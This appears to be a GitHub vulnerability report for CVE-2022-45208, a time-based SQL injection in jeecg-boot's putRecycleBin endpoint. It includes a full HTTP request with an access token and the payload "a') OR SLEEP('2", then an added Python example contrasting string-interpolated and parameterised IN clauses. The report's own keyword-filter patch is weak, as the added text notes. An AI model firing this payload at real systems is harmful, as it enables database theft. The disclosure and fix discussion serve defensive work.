sysUserMapper.xml, `revertLogicDeleted`: you can see that no precompiling is performed.
SysUserController.java
SysUserServiceImpl.java
So users can pass in malicious parameters through HTTP requests to achieve SQL injection.
PoC
The website will return immediately when the following content is passed in.
After the following content is passed in, the website will return after a delay of 2 seconds.
Vulnerability
Attackers can use this to get data from the database.
Payload:
PUT /jeecg-boot/sys/user/putRecycleBin HTTP/1.1
Host: 192.168.1.1:8088
Content-Length: 34
Request-Origion: Knife4j
Accept: /
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.1.1:8088
Referer: http://192.168.1.1:8088/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
{
"userIds": "a') OR SLEEP('2"
}
Patch
`IN (${})`
It seems that this cannot be modified to precompile, so it is recommended to add some keywords such as `')`.
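The report above identifies the root cause as a MyBatis `IN (${...})` clause that splices the request value straight into the SQL text, and proposes a keyword filter as the fix. The example below is added here and is not code from the jeecg-boot project or the issue author; it shows, against an in-memory SQLite table with constructed rows, why binding each id as a parameter is the stronger fix. The interpolated query (`revert_sql_interpolated`) is an assumed approximation of the vulnerable `${}` pattern, chosen so that the page's own payload produces the observed `OR SLEEP(...)` clause; the parameterised version is what a MyBatis `<foreach>` block emitting `#{id}` placeholders does, and it also handles the empty-list case, where a bare `IN ()` would be a syntax error.

```python
"""Added example: string-interpolated IN clause vs. a parameterised IN list.

Not part of jeecg-boot. Table layout and sample rows are constructed for
the demonstration; the interpolated query is an assumed approximation of
the vulnerable `${userIds}` mapper described in the issue.
"""
import sqlite3
from typing import List, Sequence, Tuple

# Constructed stand-ins for sys_user rows: (id, username, del_flag).
# del_flag = 1 means "logically deleted", which revertLogicDeleted undoes.
SAMPLE_USERS = [
    ("u1", "alice", 1),
    ("u2", "bob", 0),
    ("u3", "carol", 1),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sys_user (id TEXT PRIMARY KEY, username TEXT, del_flag INTEGER)"
    )
    conn.executemany("INSERT INTO sys_user VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def parse_user_ids(raw: str) -> List[str]:
    """Split the comma-separated `userIds` request field into individual ids.

    The payload from the report contains no comma, so it stays one id and is
    later bound as a single literal string rather than interpreted as SQL.
    """
    return [part.strip() for part in raw.split(",") if part.strip()]


def revert_sql_interpolated(user_ids: str) -> str:
    """Vulnerable pattern (assumed shape of the `${}` mapper): the raw request
    string is pasted into the statement text. Returned, never executed here,
    so the resulting SQL can be inspected.
    """
    return f"UPDATE sys_user SET del_flag = 0 WHERE id IN ('{user_ids}')"


def revert_sql_parameterised(user_ids: Sequence[str]) -> Tuple[str, Tuple[str, ...]]:
    """Safe pattern: one `?` placeholder per id, values passed separately.

    This is what MyBatis `<foreach ... open="(" separator="," close=")">#{id}</foreach>`
    produces; the database driver never sees the ids as SQL text.
    """
    placeholders = ",".join("?" for _ in user_ids)
    sql = f"UPDATE sys_user SET del_flag = 0 WHERE id IN ({placeholders})"
    return sql, tuple(user_ids)


def revert_logic_deleted(conn: sqlite3.Connection, user_ids: Sequence[str]) -> int:
    """Un-delete the given ids with bound parameters; returns rows affected."""
    if not user_ids:
        # `IN ()` is a syntax error in most databases; treat it as a no-op.
        return 0
    sql, params = revert_sql_parameterised(user_ids)
    cur = conn.execute(sql, params)
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    payload = "a') OR SLEEP('2"   # the request body value quoted in the report
    print("interpolated SQL:", revert_sql_interpolated(payload))
    conn = make_db()
    print("rows reverted for 'u1,u3':", revert_logic_deleted(conn, parse_user_ids("u1,u3")))
    print("rows reverted for payload:", revert_logic_deleted(conn, parse_user_ids(payload)))
```

Running the block prints the interpolated statement, in which the payload has become a second `OR SLEEP('2')` condition, while the parameterised path reverts exactly the two deleted sample rows for `u1,u3` and affects zero rows for the payload, because the whole string is compared as an id value. A keyword denylist, as the report suggests, only narrows which strings reach the splice; parameter binding removes the splice.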
Related: /sys/user/deleteRecycleBin is affected by sql injection #4125
azraelxuemo changed the title from "/sys/user/putRecycleBin is affected by sql injection" to "[CVE-2022-45208] /sys/user/putRecycleBin is affected by sql injection" on Dec 7, 2022.
XKC1025 pushed a commit to XKC1025/jeecg-boot that referenced this issue on Mar 13, 2023.